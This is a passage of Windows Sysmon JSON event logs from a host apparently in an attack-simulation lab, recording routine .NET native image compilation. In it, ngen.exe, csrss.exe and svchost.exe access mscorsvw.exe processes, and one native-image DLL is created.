C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.884","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-0010B9EE0B00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.884\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-0010B9EE0B00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.884","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-0010B9EE0B00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.900\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-0010B9EE0B00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.900","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-0010B9EE0B00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:18.400\r\nProcessGuid: {A837DB8D-043D-5F25-0000-0010B9EE0B00}\r\nProcessId: 1320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\528-0\\System.Transactions.dll\r\nCreationUtcTime: 2020-08-01 05:57:18.400","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:18.400","ProcessGuid":"{A837DB8D-043D-5F25-0000-0010B9EE0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\528-0\\System.Transactions.dll","CreationUtcTime":"2020-08-01 05:57:18.400","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.446\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-00109FF20B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.446","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-00109FF20B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.446\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-00109FF20B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.446","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-00109FF20B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.446\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-00109FF20B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.446","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-00109FF20B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.884\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-001090F60B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.884","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-001090F60B00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.884\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-001090F60B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.884","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-001090F60B00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:18.900\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043E-5F25-0000-001090F60B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 